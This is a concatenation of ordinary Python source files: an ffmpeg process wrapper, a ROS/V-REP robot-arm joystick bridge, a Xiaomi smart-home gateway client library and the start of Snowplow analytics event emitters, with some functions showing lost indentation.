        self.is_output_streaming = outpath == "-"

        # Input options
        if self._in_opts is None:
            in_opts = self.DEFAULT_IN_OPTS
        else:
            in_opts = self._in_opts

        # Output options
        if self._out_opts is None:
            if is_supported_video_file(outpath):
                out_opts = self.DEFAULT_VIDEO_OUT_OPTS
            else:
                out_opts = self.DEFAULT_IMAGES_OUT_OPTS
        else:
            out_opts = self._out_opts

        # Add filters to output options, if necessary
        #
        # ffmpeg allows only one "-vf" flag, so if the caller already
        # supplied one, the generated filters are appended to its value
        # (comma-separated) rather than added as a second flag
        out_opts = list(out_opts)
        if self._filter_opts:
            merged = False
            for idx, o in enumerate(out_opts):
                if o.strip() == self._filter_opts[0]:
                    # Merge with existing filter(s)
                    out_opts[idx + 1] += "," + self._filter_opts[1]
                    merged = True
                    break

            if not merged:
                # Append filters
                out_opts += self._filter_opts

        # Construct ffmpeg command
        self._args = (
            ["ffmpeg"]
            + self._global_opts
            + in_opts
            + ["-i", inpath]
            + out_opts
            + [outpath]
        )

        if not self.is_output_streaming:
            etau.ensure_path(outpath)

        if verbose:
            logger.info("Executing '%s'", self.cmd)
        else:
            logger.debug("Executing '%s'", self.cmd)

        try:
            self._p = Popen(self._args, stdin=PIPE, stdout=PIPE, stderr=PIPE)
        except EnvironmentError as e:
            # ENOENT means the ffmpeg binary was not found on the PATH
            if e.errno == errno.ENOENT:
                raise etau.ExecutableNotFoundError(exe="ffmpeg")

            raise

        # Run non-streaming jobs immediately
        if not (self.is_input_streaming or self.is_output_streaming):
            err = self._p.communicate()[1]
            if self._p.returncode != 0:
                raise etau.ExecutableRuntimeError(self.cmd, err)

    def stream(self, string):
        """Writes the string to ffmpeg's stdin stream.

        Args:
            string: the string to write

        Raises:
            FFmpegStreamingError: if input streaming mode is not active
        """
        if not self.is_input_streaming:
            raise FFmpegStreamingError("Not currently input streaming")

        self._p.stdin.write(string)

    def read(self, num_bytes):
        """Reads the given number of bytes from ffmpeg's stdout stream.

        Args:
            num_bytes: the number of bytes to read

        Returns:
            the bytes

        Raises:
            FFmpegStreamingError: if output streaming mode is not active
        """
        if not self.is_output_streaming:
            raise FFmpegStreamingError("Not currently output streaming")

        return self._p.stdout.read(num_bytes)

    def close(self):
        """Closes a streaming ffmpeg program, if necessary."""
        if self.is_input_streaming or self.is_output_streaming:
            # Closing stdin signals EOF to ffmpeg, allowing it to finalize
            # the output before wait() returns
            self._p.stdin.close()
            self._p.stdout.close()
            self._p.wait()

        self._p = None
        self.is_input_streaming = False
        self.is_output_streaming = False

    @staticmethod
    def _gen_filter_opts(fps, size, scale):
        # Builds the ["-vf", "<filters>"] output options implied by the
        # fps/size/scale constructor args, or [] if none apply
        filters = []
        if fps is not None and fps > 0:
            filters.append("fps={0}".format(fps))

        if size:
            filters.append("scale={0}:{1}".format(*size))

            #
            # If the aspect ratio is changing, we must manually set SAR/DAR
            # https://stackoverflow.com/questions/34148780/ffmpeg-setsar-value-gets-overriden
            #
            if all(p > 0 for p in size):
                # Force square pixels
                filters.append("setsar=sar=1:1")

                # Force correct display aspect ratio when playing video
                filters.append("setdar=dar={0}/{1}".format(*size))
        elif scale:
            filters.append("scale=iw*{0}:ih*{0}".format(scale))

        return ["-vf", ",".join(filters)] if filters else []
class FFmpegStreamingError(Exception):
    """Raised when an error occurs while operating an FFmpeg instance in
    streaming mode.
    """

    pass
class FOURCC(object):
    """Class representing a FOURCC code."""

    def __init__(self, _i=None, _s=None):
        """Creates a FOURCC instance.

        Don't call this directly! Instead, use `from_str` or `from_int` to
        create a FOURCC instance.

        Args:
            _i: the integer representation of the FOURCC code
            _s: the string representation of the FOURCC code
        """
        # BUG FIX: use `is not None` rather than truthiness so that the
        # legal integer code 0 (and the corresponding NUL string) is handled
        if _i is not None:
            self.int = _i
            self.str = FOURCC.int_to_str(_i)
        elif _s is not None:
            self.int = FOURCC.str_to_int(_s)
            self.str = _s

    @classmethod
    def from_str(cls, s):
        """Construct a FOURCC instance from a string.

        Args:
            s: the string representation of the FOURCC code

        Returns:
            a FOURCC instance
        """
        return cls(_s=s)

    @classmethod
    def from_int(cls, i):
        """Construct a FOURCC instance from an integer.

        Args:
            i: the integer representation of the FOURCC code

        Returns:
            a FOURCC instance
        """
        return cls(_i=i)

    @staticmethod
    def str_to_int(s):
        """Returns the integer representation of the given FOURCC string.

        Args:
            s: the string representation of the FOURCC code

        Returns:
            the integer representation of the FOURCC code
        """
        try:
            # OpenCV 3
            return cv2.VideoWriter_fourcc(*s)
        except AttributeError:
            # OpenCV 2
            # pylint: disable=no-member
            return cv2.cv.FOURCC(*s)

    @staticmethod
    def int_to_str(i):
        """Returns the string representation of the given FOURCC integer.

        Args:
            i: the integer representation of the FOURCC code

        Returns:
            the string representation of the FOURCC code
        """
        # Each byte of the little-endian integer holds one ASCII character
        return (
            chr((i & 0x000000FF) >> 0)
            + chr((i & 0x0000FF00) >> 8)
            + chr((i & 0x00FF0000) >> 16)
            + chr((i & 0xFF000000) >> 24)
        )
|
robot_module.py | #!/usr/bin/env python
import rospy
import threading
import vrep
import time
from sensor_msgs.msg import Joy
from sensor_msgs.msg import JointState
class Robot():
    """Joystick teleoperation bridge between ROS and a V-REP robot arm.

    Subscribes to /joy and nudges a target sphere in the simulator; publishes
    the (encoder-mapped) joint states on /JointStates.
    """

    def __init__(self, connectionAddress='127.0.0.1', connectionPort=19997, waitUntilConnected=True, doNotReconnectOnceDisconnected=True, timeOutInMs=5000, commThreadCycleInMs=5):
        rospy.init_node('robot_arm_node')
        self.clientID = None
        self.target_sphere_handle = None

        # Individual handles are kept for backward compatibility; the
        # `axis_handle` list below is what get_object_handle() populates
        self.axis_j1_handle = None
        self.axis_j2_handle = None
        self.axis_j3_handle = None
        self.axis_j4_handle = None
        self.axis_j5_handle = None
        self.axis_j6_handle = None
        # BUG FIX: get_object_handle() assigned into self.axis_handle, which
        # was never created
        self.axis_handle = [None] * 6
        self.target_handle = None
        self.tip_handle = None

        # V-REP remote API connection parameters
        self.connectionAddress = connectionAddress
        self.connectionPort = connectionPort
        self.waitUntilConnected = waitUntilConnected
        self.doNotReconnectOnceDisconnected = doNotReconnectOnceDisconnected
        self.timeOutInMs = timeOutInMs
        self.commThreadCycleInMs = commThreadCycleInMs

        t1 = threading.Thread(target=self.subscriber_thread)
        t1.daemon = True  # don't block interpreter shutdown
        t1.start()

        self.joint_state_pub = rospy.Publisher("/JointStates", JointState, queue_size=1)

    def subscriber_thread(self):
        """Registers the /joy subscriber and spins until shutdown."""
        self.joystick_sub = rospy.Subscriber("/joy", Joy, self.joy_control_cb)
        rospy.spin()

    def joy_control_cb(self, data):
        """Moves the target sphere according to the joystick buttons.

        Args:
            data: a sensor_msgs/Joy message
        """
        returnCode, self.target_sphere_handle = vrep.simxGetObjectHandle(self.clientID, 'Target_sphere', vrep.simx_opmode_oneshot_wait)
        if returnCode != 0:
            return

        _, pos = vrep.simxGetObjectPosition(self.clientID, self.target_sphere_handle, -1, vrep.simx_opmode_oneshot_wait)
        _, orient = vrep.simxGetObjectOrientation(self.clientID, self.target_sphere_handle, -1, vrep.simx_opmode_oneshot_wait)

        # BUG FIX: the original indexed into empty lists (IndexError) and
        # never initialized the orientation list (NameError); build fresh
        # lists from the current pose instead
        position = [
            pos[0] + 0.001 * data.buttons[3] - 0.001 * data.buttons[2],
            pos[1] + 0.001 * data.buttons[4] - 0.001 * data.buttons[1],
            pos[2] + 0.001 * data.buttons[6] - 0.001 * data.buttons[5],
        ]
        orientation = [
            orient[0] + 0.01 * data.buttons[14] - 0.01 * data.buttons[15],
            orient[1] + 0.001 * data.buttons[4] - 0.001 * data.buttons[1],
            orient[2] + 0.01 * data.buttons[12] - 0.01 * data.buttons[13],
        ]

        vrep.simxSetObjectPosition(self.clientID, self.target_sphere_handle, -1, position, vrep.simx_opmode_oneshot_wait)
        vrep.simxSetObjectOrientation(self.clientID, self.target_sphere_handle, -1, orientation, vrep.simx_opmode_oneshot_wait)

    def get_object_handle(self):
        """Fetches (and caches) the six joint handles.

        Returns:
            the list of six joint handles
        """
        # BUG FIX: the original assigned into a nonexistent attribute and
        # returned an undefined local name
        for idx in range(6):
            _, self.axis_handle[idx] = vrep.simxGetObjectHandle(self.clientID, 'axis_j%d' % (idx + 1), vrep.simx_opmode_oneshot_wait)

        #returnCode,self.target_handle = vrep.simxGetObjectHandle(self.clientID,'Target',vrep.simx_opmode_oneshot_wait)
        #returnCode,self.tip_handle = vrep.simxGetObjectHandle(self.clientID,'Tip',vrep.simx_opmode_oneshot_wait)
        return self.axis_handle

    def pub_joint_states(self):
        """Reads all joint angles from V-REP and publishes them on
        /JointStates, mapped from radians to encoder counts.
        """
        import math  # local import keeps the module's dependencies unchanged

        # Map radians in [-2*pi, 2*pi] to encoder counts in [-160000, 160000]
        Xmin = -2 * math.pi
        Xmax = 2 * math.pi
        Ymin = -6400 * 25
        Ymax = 6400 * 25

        # BUG FIX: the original reassigned its accumulator inside the loop
        # and called map_joint_angle/pub helpers unqualified
        joint_positions = []
        for joint in self.get_object_handle():
            _, angle = vrep.simxGetJointPosition(self.clientID, joint, vrep.simx_opmode_oneshot_wait)
            joint_positions.append(self.map_joint_angle(angle, Xmin, Xmax, Ymin, Ymax))

        joint_state_msg = JointState()
        # BUG FIX: rospy has no `time()`; use rospy.Time.now()
        joint_state_msg.header.stamp = rospy.Time.now()
        joint_state_msg.header.frame_id = "Robot_frame"
        joint_state_msg.position = joint_positions
        self.joint_state_pub.publish(joint_state_msg)

    def map_joint_angle(self, value, xmin, xmax, ymin, ymax):
        """Linearly maps `value` from [xmin, xmax] to [ymin, ymax]."""
        out = (((value - xmin) * (ymax - ymin)) / (xmax - xmin)) + ymin
        return out

    def connect(self):
        """Connects to the V-REP remote API server and, on success, publishes
        joint states until ROS shuts down.
        """
        vrep.simxFinish(-1)  # close all opened connections
        self.clientID = vrep.simxStart(self.connectionAddress, self.connectionPort, self.waitUntilConnected, self.doNotReconnectOnceDisconnected, self.timeOutInMs, self.commThreadCycleInMs)  # Connect to V-REP
        if self.clientID != -1:
            print('Connected to remote API server')
            while not rospy.is_shutdown():
                try:
                    # BUG FIX: was an unqualified call to pub_joint_states()
                    self.pub_joint_states()
                except rospy.ROSInterruptException:
                    pass
        else:
            rospy.loginfo("Failed connecting to remote API server")
"""
if __name__ == "__main__":
R = Robot()
R.connect()
"""
|
__init__.py | """Library to handle connection with Xiaomi Gateway"""
import socket
import json
import logging
import platform
import struct
from collections import defaultdict
from threading import Thread
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
_LOGGER = logging.getLogger(__name__)
# Number of times a device read is retried during discovery.
DEFAULT_DISCOVERY_RETRIES = 4
# Hub models recognised as gateways in discovery responses.
GATEWAY_MODELS = ['gateway', 'gateway.v3', 'acpartner.v3']
SOCKET_BUFSIZE = 4096
# Xiaomi gateways push status messages on this multicast group/port.
MULTICAST_PORT = 9898
MULTICAST_ADDRESS = '224.0.0.50'
def create_mcast_socket(interface, port):
    """Create and bind a socket for communication.

    :param interface: local interface IP to bind, or 'any' for all interfaces.
    :param port: UDP port to bind.
    :return: a UDP socket joined to the Xiaomi multicast group.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    if interface != 'any':
        if platform.system() != "Windows":
            try:
                # Binding the group address filters out unicast traffic,
                # but is not permitted on every platform/interface.
                sock.bind((MULTICAST_ADDRESS, port))
            except OSError:
                sock.bind((interface, port))
        else:
            # Windows cannot bind a multicast address directly.
            sock.bind((interface, port))
        mreq = socket.inet_aton(MULTICAST_ADDRESS) + socket.inet_aton(interface)
    else:
        # BUG FIX: the original wrapped this bind in a try/except whose
        # handler retried the *identical* call — a single bind is equivalent.
        sock.bind(('', port))
        mreq = struct.pack("=4sl", socket.inet_aton(MULTICAST_ADDRESS), socket.INADDR_ANY)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
    return sock
class XiaomiGatewayDiscovery:
    """Discovers Xiaomi gateways on the local network and listens for the
    multicast status messages they push."""
    # pylint: disable=too-many-instance-attributes

    GATEWAY_DISCOVERY_PORT = 4321

    def __init__(self, callback_func, gateways_config, interface,
                 device_discovery_retries=DEFAULT_DISCOVERY_RETRIES):
        """
        :param callback_func: invoked for every push message as
            callback_func(gateway.push_data, data).
        :param gateways_config: list of dicts with host/port/sid/key entries.
        :param interface: local interface IP, or 'any'.
        :param device_discovery_retries: read attempts per device.
        """
        self.disabled_gateways = []
        self.gateways = defaultdict(list)
        self.callback_func = callback_func
        self._listening = False
        self._mcastsocket = None
        self._threads = []
        self._gateways_config = gateways_config
        self._interface = interface
        self._device_discovery_retries = device_discovery_retries

    # pylint: disable=too-many-branches, too-many-locals, too-many-statements
    def discover_gateways(self):
        """Discover gateways using multicast"""
        _socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        _socket.settimeout(5.0)
        if self._interface != 'any':
            _socket.bind((self._interface, 0))
        # First register the gateways listed explicitly in the config.
        for gateway in self._gateways_config:
            host = gateway.get('host')
            port = gateway.get('port')
            sid = gateway.get('sid')
            if not (host and port and sid):
                continue
            try:
                ip_address = socket.gethostbyname(host)
                if gateway.get('disable'):
                    _LOGGER.info(
                        'Xiaomi Gateway %s is disabled by configuration', sid)
                    self.disabled_gateways.append(ip_address)
                    continue
                _LOGGER.info(
                    'Xiaomi Gateway %s configured at IP %s:%s',
                    sid, ip_address, port)
                self.gateways[ip_address] = XiaomiGateway(
                    ip_address, sid, gateway.get('key'),
                    self._device_discovery_retries,
                    self._interface, port, gateway.get('proto'))
            except OSError as error:
                _LOGGER.error(
                    "Could not resolve %s: %s", host, error)
        # Then find any others via the multicast "whois" broadcast.
        try:
            _socket.sendto('{"cmd":"whois"}'.encode(),
                           (MULTICAST_ADDRESS, self.GATEWAY_DISCOVERY_PORT))
            while True:
                data, (ip_add, _) = _socket.recvfrom(SOCKET_BUFSIZE)
                # BUG FIX: the original tested `len(data) is None`, which is
                # always False; skip empty replies and known gateways.
                if not data or ip_add in self.gateways:
                    continue
                if ip_add in self.disabled_gateways:
                    continue
                resp = json.loads(data.decode())
                if resp["cmd"] != 'iam':
                    _LOGGER.error("Response does not match return cmd")
                    continue
                if resp["model"] not in GATEWAY_MODELS:
                    _LOGGER.error("Response must be gateway model")
                    continue
                # Match the reply against the config to pick up the key
                # and the disable flag for this sid.
                disabled = False
                gateway_key = None
                for gateway in self._gateways_config:
                    sid = gateway.get('sid')
                    if sid is None or sid == resp["sid"]:
                        gateway_key = gateway.get('key')
                    if sid and sid == resp['sid'] and gateway.get('disable'):
                        disabled = True
                sid = resp["sid"]
                if disabled:
                    _LOGGER.info("Xiaomi Gateway %s is disabled by configuration",
                                 sid)
                    self.disabled_gateways.append(ip_add)
                else:
                    _LOGGER.info('Xiaomi Gateway %s found at IP %s', sid, ip_add)
                    self.gateways[ip_add] = XiaomiGateway(
                        ip_add, sid, gateway_key,
                        self._device_discovery_retries, self._interface, resp["port"],
                        resp.get("proto_version"))
        except socket.timeout:
            _LOGGER.info("Gateway discovery finished in 5 seconds")
        _socket.close()

    def listen(self):
        """Start listening."""
        _LOGGER.info('Creating Multicast Socket')
        self._mcastsocket = create_mcast_socket(self._interface, MULTICAST_PORT)
        # Timeout ensures the _listen_to_msg loop can notice a stop request.
        self._mcastsocket.settimeout(5.0)
        self._listening = True
        thread = Thread(target=self._listen_to_msg, args=())
        self._threads.append(thread)
        thread.daemon = True
        thread.start()

    def stop_listen(self):
        """Stop listening."""
        self._listening = False
        if self._mcastsocket is not None:
            _LOGGER.info('Closing multisocket')
            self._mcastsocket.close()
            self._mcastsocket = None
        for thread in self._threads:
            thread.join()
        _LOGGER.info('Multisocket stopped')

    def _listen_to_msg(self):
        """Worker loop: receive multicast packets and dispatch them."""
        while self._listening:
            if self._mcastsocket is None:
                continue
            try:
                data, (ip_add, _) = self._mcastsocket.recvfrom(SOCKET_BUFSIZE)
            except socket.timeout:
                continue
            try:
                data = json.loads(data.decode("ascii"))
                gateway = self.gateways.get(ip_add)
                if gateway is None:
                    if ip_add not in self.disabled_gateways:
                        _LOGGER.error('Unknown gateway ip %s', ip_add)
                    continue
                cmd = data['cmd']
                if cmd == 'heartbeat' and data['model'] in GATEWAY_MODELS:
                    # Heartbeats from the hub itself carry a fresh token.
                    gateway.token = data['token']
                elif cmd in ('report', 'heartbeat'):
                    _LOGGER.debug('MCAST (%s) << %s', cmd, data)
                    self.callback_func(gateway.push_data, data)
                else:
                    _LOGGER.error('Unknown multicast data: %s', data)
            # pylint: disable=broad-except
            except Exception:
                _LOGGER.error('Cannot process multicast message: %s', data)
                continue
        _LOGGER.info('Listener stopped')
# pylint: disable=too-many-instance-attributes
class XiaomiGateway:
    """Xiaomi Gateway Component"""

    # pylint: disable=too-many-arguments
    def __init__(self, ip_adress, sid, key, discovery_retries, interface, port=MULTICAST_PORT, proto=None):
        # Gateway network coordinates and credentials.
        self.ip_adress = ip_adress
        self.port = int(port)
        self.sid = sid
        self.key = key
        # Discovered child devices grouped by platform name ('sensor', ...).
        self.devices = defaultdict(list)
        # Per-device-sid callbacks invoked by push_data().
        self.callbacks = defaultdict(list)
        self.token = None
        self.connection_error = False
        self.mac_error = False
        self._discovery_retries = discovery_retries
        self._interface = interface
        # When the protocol version is unknown, ask the gateway for it.
        if proto is None:
            cmd = '{"cmd":"read","sid":"' + sid + '"}'
            resp = self._send_cmd(cmd)
            proto = _get_value(resp, "proto_version") if _validate_data(resp) else None
        self.proto = '1.0' if proto is None else proto
        # Device discovery can be flaky; retry up to trycount times.
        trycount = 5
        for _ in range(trycount):
            _LOGGER.info('Discovering Xiaomi Devices')
            if self._discover_devices():
                break

    # pylint: disable=too-many-branches
    def _discover_devices(self):
        """Query the gateway for its device list and register each device.

        Returns True when the gateway answered with a usable device list.
        """
        # Command / ack names differ between protocol v1 and v2.
        cmd = '{"cmd" : "get_id_list"}' if int(self.proto[0:1]) == 1 else '{"cmd":"discovery"}'
        resp = self._send_cmd(cmd, "get_id_list_ack") if int(self.proto[0:1]) == 1 \
            else self._send_cmd(cmd, "discovery_rsp")
        if resp is None or "token" not in resp or ("data" not in resp and "dev_list" not in resp):
            return False
        self.token = resp['token']
        sids = []
        if int(self.proto[0:1]) == 1:
            sids = json.loads(resp["data"])
        else:
            for dev in resp["dev_list"]:
                sids.append(dev["sid"])
        # The gateway itself is also a device (sensor/light).
        sids.append(self.sid)
        _LOGGER.info('Found %s devices', len(sids))
        # Model name -> platform mapping; a model may appear under several
        # platforms (e.g. 'gateway' is both a sensor and a light).
        device_types = {
            'sensor': ['sensor_ht', 'gateway', 'gateway.v3', 'weather',
                       'weather.v1', 'sensor_motion.aq2', 'acpartner.v3', 'vibration'],
            'binary_sensor': ['magnet', 'sensor_magnet', 'sensor_magnet.aq2',
                              'motion', 'sensor_motion', 'sensor_motion.aq2',
                              'switch', 'sensor_switch', 'sensor_switch.aq2', 'sensor_switch.aq3', 'remote.b1acn01',
                              '86sw1', 'sensor_86sw1', 'sensor_86sw1.aq1', 'remote.b186acn01', 'remote.b186acn02',
                              '86sw2', 'sensor_86sw2', 'sensor_86sw2.aq1', 'remote.b286acn01', 'remote.b286acn02',
                              'cube', 'sensor_cube', 'sensor_cube.aqgl01',
                              'smoke', 'sensor_smoke',
                              'natgas', 'sensor_natgas',
                              'sensor_wleak.aq1',
                              'vibration', 'vibration.aq1'],
            'switch': ['plug',
                       'ctrl_neutral1', 'ctrl_neutral1.aq1', 'switch_b1lacn02', 'switch.b1lacn02',
                       'ctrl_neutral2', 'ctrl_neutral2.aq1', 'switch_b2lacn02', 'switch.b2lacn02',
                       'ctrl_ln1', 'ctrl_ln1.aq1', 'switch_b1nacn02', 'switch.b1nacn02',
                       'ctrl_ln2', 'ctrl_ln2.aq1', 'switch_b2nacn02', 'switch.b2nacn02',
                       '86plug', 'ctrl_86plug', 'ctrl_86plug.aq1'],
            'light': ['gateway', 'gateway.v3'],
            'cover': ['curtain', 'curtain.aq2', 'curtain.hagl04'],
            'lock': ['lock.aq1', 'lock.acn02']}
        for sid in sids:
            cmd = '{"cmd":"read","sid":"' + sid + '"}'
            # Read each device, retrying a few times before giving up.
            for retry in range(self._discovery_retries):
                _LOGGER.debug("Discovery attempt %d/%d", retry + 1, self._discovery_retries)
                resp = self._send_cmd(cmd, "read_ack") if int(self.proto[0:1]) == 1 else self._send_cmd(cmd, "read_rsp")
                if _validate_data(resp):
                    break
            if not _validate_data(resp):
                _LOGGER.error("Not a valid device. Check the mac adress and update the firmware.")
                self.mac_error = True
                continue
            model = resp["model"]
            supported = False
            for device_type in device_types:
                if model in device_types[device_type]:
                    supported = True
                    xiaomi_device = {
                        "model": model,
                        "proto": self.proto,
                        # Sids are zero-padded to 12 characters.
                        "sid": resp["sid"].rjust(12, '0'),
                        "short_id": resp["short_id"] if "short_id" in resp else 0,
                        "data": _list2map(_get_value(resp)),
                        "raw_data": resp}
                    self.devices[device_type].append(xiaomi_device)
                    _LOGGER.debug('Registering device %s, %s as: %s', sid, model, device_type)
            if not supported:
                if model:
                    _LOGGER.error(
                        'Unsupported device found! Please create an issue at '
                        'https://github.com/Danielhiversen/PyXiaomiGateway/issues '
                        'and provide the following data: %s', resp)
                else:
                    _LOGGER.error(
                        'The device with sid %s isn\'t supported of the used '
                        'gateway firmware. Please update the gateway firmware if '
                        'possible! This is the only way the issue can be solved.',
                        resp["sid"])
                continue
        return True

    def _send_cmd(self, cmd, rtn_cmd=None):
        """Send *cmd* to the gateway over UDP and return the decoded JSON
        reply, or None on timeout or when the reply's cmd != *rtn_cmd*."""
        try:
            _socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            if self._interface != 'any':
                _socket.bind((self._interface, 0))
            _socket.settimeout(10.0)
            _LOGGER.debug("_send_cmd >> %s", cmd.encode())
            _socket.sendto(cmd.encode(), (self.ip_adress, self.port))
            data, _ = _socket.recvfrom(SOCKET_BUFSIZE)
        except socket.timeout:
            _LOGGER.error("Cannot connect to Gateway")
            self.connection_error = True
            return None
        finally:
            _socket.close()
        if data is None:
            _LOGGER.error("No response from Gateway")
            return None
        resp = json.loads(data.decode())
        _LOGGER.debug("_send_cmd resp << %s", resp)
        if rtn_cmd is not None and resp['cmd'] != rtn_cmd:
            _LOGGER.error("Non matching response. Expecting %s, but got %s", rtn_cmd, resp['cmd'])
            return None
        return resp

    def write_to_hub(self, sid, **kwargs):
        """Send data to gateway to turn on / off device"""
        if self.key is None:
            _LOGGER.error('Gateway Key is not provided. Can not send commands to the gateway.')
            return False
        data = {}
        for key in kwargs:
            data[key] = kwargs[key]
        if not self.token:
            _LOGGER.debug('Gateway Token was not obtained yet. Cannot send commands to the gateway.')
            return False
        cmd = dict()
        cmd['cmd'] = 'write'
        cmd['sid'] = sid
        # Protocol v1 signs the payload; v2 signs the envelope.
        if int(self.proto[0:1]) == 1:
            data['key'] = self._get_key()
            cmd['data'] = data
        else:
            cmd['key'] = self._get_key()
            cmd['params'] = [data]
        resp = self._send_cmd(json.dumps(cmd), "write_ack") if int(self.proto[0:1]) == 1 \
            else self._send_cmd(json.dumps(cmd), "write_rsp")
        _LOGGER.debug("write_ack << %s", resp)
        if _validate_data(resp):
            return True
        if not _validate_keyerror(resp):
            return False
        # If 'invalid key' message we ask for a new token
        resp = self._send_cmd('{"cmd" : "get_id_list"}', "get_id_list_ack") if int(self.proto[0:1]) == 1 \
            else self._send_cmd('{"cmd" : "discovery"}', "discovery_rsp")
        _LOGGER.debug("get_id_list << %s", resp)
        if resp is None or "token" not in resp:
            _LOGGER.error('No new token from gateway. Can not send commands to the gateway.')
            return False
        self.token = resp['token']
        # Re-sign the command with the refreshed token and retry once.
        if int(self.proto[0:1]) == 1:
            data['key'] = self._get_key()
            cmd['data'] = data
        else:
            cmd['key'] = self._get_key()
            cmd['params'] = [data]
        resp = self._send_cmd(json.dumps(cmd), "write_ack") if int(self.proto[0:1]) == 1 \
            else self._send_cmd(json.dumps(cmd), "write_rsp")
        _LOGGER.debug("write_ack << %s", resp)
        return _validate_data(resp)

    def get_from_hub(self, sid):
        """Get data from gateway"""
        cmd = '{ "cmd":"read","sid":"' + sid + '"}'
        resp = self._send_cmd(cmd, "read_ack") if int(self.proto[0:1]) == 1 else self._send_cmd(cmd, "read_rsp")
        _LOGGER.debug("read_ack << %s", resp)
        return self.push_data(resp)

    def push_data(self, data):
        """Push data broadcasted from gateway to device"""
        if not _validate_data(data):
            return False
        jdata = json.loads(data['data']) if int(self.proto[0:1]) == 1 else _list2map(data['params'])
        if jdata is None:
            return False
        sid = data['sid']
        # Fan the update out to every callback registered for this device.
        for func in self.callbacks[sid]:
            func(jdata, data)
        return True

    def _get_key(self):
        """Get key using token from gateway"""
        # Fixed IV published in the Xiaomi gateway protocol documentation —
        # the token is AES-CBC encrypted with the user's key.
        init_vector = bytes(bytearray.fromhex('17996d093d28ddb3ba695a2e6f58562e'))
        encryptor = Cipher(algorithms.AES(self.key.encode()), modes.CBC(init_vector),
                           backend=default_backend()).encryptor()
        ciphertext = encryptor.update(self.token.encode()) + encryptor.finalize()
        if isinstance(ciphertext, str):  # For Python 2 compatibility
            return ''.join('{:02x}'.format(ord(x)) for x in ciphertext)
        return ''.join('{:02x}'.format(x) for x in ciphertext)
def _validate_data(data):
if data is None or ("data" not in data and "params" not in data):
_LOGGER.error('No data in response from hub %s', data)
return False
if "data" in data and 'error' in json.loads(data['data']):
_LOGGER.error('Got error element in data %s', data['data'])
return False
if "params" in data:
for param in data['params']:
if 'error' in param:
_LOGGER.error('Got error element in data %s', data['params'])
return False
return True
def _validate_keyerror(data):
if data is not None and "data" in data and 'Invalid key' in data['data']:
return True
if data is not None and "params" in data:
for param in data['params']:
if 'error' in param and 'Invalid key' in param['error']:
return True
return False
def _get_value(resp, data_key=None):
    """Extract the payload from *resp*.

    With *data_key* set, return just that key's value (searching list
    payloads element by element); otherwise return the whole payload.
    Returns None for invalid responses or a missing key."""
    if not _validate_data(resp):
        return None
    payload = json.loads(resp["data"]) if "data" in resp else resp["params"]
    if data_key is None:
        return payload
    if isinstance(payload, list):
        return next((item[data_key] for item in payload if data_key in item),
                    None)
    return payload.get(data_key)
def _list2map(data):
if not isinstance(data, list):
return data
new_data = {}
for obj in data:
for key in obj:
new_data[key] = obj[key]
new_data['raw_data'] = data
return new_data
|
emitters.py | """
emitters.py
Copyright (c) 2013-2014 Snowplow Analytics Ltd. All rights reserved.
This program is licensed to you under the Apache License Version 2.0,
and you may not use this file except in compliance with the Apache License
Version 2.0. You may obtain a copy of the Apache License Version 2.0 at
http://www.apache.org/licenses/LICENSE-2.0.
Unless required by applicable law or agreed to in writing,
software distributed under the Apache License Version 2.0 is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
express or implied. See the Apache License Version 2.0 for the specific
language governing permissions and limitations there under.
Authors: Anuj More, Alex Dean, Fred Blundun
Copyright: Copyright (c) 2013-2014 Snowplow Analytics Ltd
License: Apache License Version 2.0
"""
import requests
import json
import threading
import celery
from celery import Celery
from celery.contrib.methods import task
import redis
import logging
from contracts import contract, new_contract
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)

# Buffering / threading defaults for the emitters below.
DEFAULT_MAX_LENGTH = 10
THREAD_TIMEOUT = 10
# Iglu schema wrapped around every POSTed event batch.
PAYLOAD_DATA_SCHEMA = "iglu:com.snowplowanalytics.snowplow/payload_data/jsonschema/1-0-2"

# PyContracts custom types referenced from the ":type" docstring clauses
# in the emitter methods below.
new_contract("protocol", lambda x: x == "http" or x == "https")
new_contract("method", lambda x: x == "get" or x == "post")
new_contract("function", lambda x: hasattr(x, "__call__"))
new_contract("redis", lambda x: isinstance(x, (redis.Redis, redis.StrictRedis)))

try:
    # Check whether a custom Celery configuration module named "snowplow_celery_config" exists
    import snowplow_celery_config
    app = Celery()
    app.config_from_object(snowplow_celery_config)
except ImportError:
    # Otherwise configure Celery with default settings
    app = Celery("Snowplow", broker="redis://guest@localhost//")
class Emitter(object):
    """
    Synchronously send Snowplow events to a Snowplow collector
    Supports both GET and POST requests
    """
    # NOTE: the @contract decorators parse the ":type" clauses in the
    # docstrings below, so those lines are part of the runtime contract.
    @contract
    def __init__(self, endpoint, protocol="http", port=None, method="get", buffer_size=None, on_success=None, on_failure=None):
        """
        :param endpoint: The collector URL. Don't include "http://" - this is done automatically.
        :type endpoint: string
        :param protocol: The protocol to use - http or https. Defaults to http.
        :type protocol: protocol
        :param port: The collector port to connect to
        :type port: int | None
        :param method: The HTTP request method
        :type method: method
        :param buffer_size: The maximum number of queued events before the buffer is flushed. Default is 10.
        :type buffer_size: int | None
        :param on_success: Callback executed after every HTTP request in a flush has status code 200
                           Gets passed the number of events flushed.
        :type on_success: function | None
        :param on_failure: Callback executed if at least one HTTP request in a flush has a status code other than 200
                           Gets passed two arguments:
                           1) The number of events which were successfully sent
                           2) If method is "post": The unsent data in string form;
                              If method is "get":  An array of dictionaries corresponding to the unsent events' payloads
        :type on_failure: function | None
        """
        self.endpoint = Emitter.as_collector_uri(endpoint, protocol, port, method)
        self.method = method
        # POSTs batch events (default 10); GETs default to one at a time.
        if buffer_size is None:
            if method == "post":
                buffer_size = DEFAULT_MAX_LENGTH
            else:
                buffer_size = 1
        self.buffer_size = buffer_size
        self.buffer = []
        self.on_success = on_success
        self.on_failure = on_failure
        self.threads = []
        logger.info("Emitter initialized with endpoint " + self.endpoint)

    @staticmethod
    @contract
    def as_collector_uri(endpoint, protocol="http", port=None, method="get"):
        """
        Build the full collector URI from its parts.

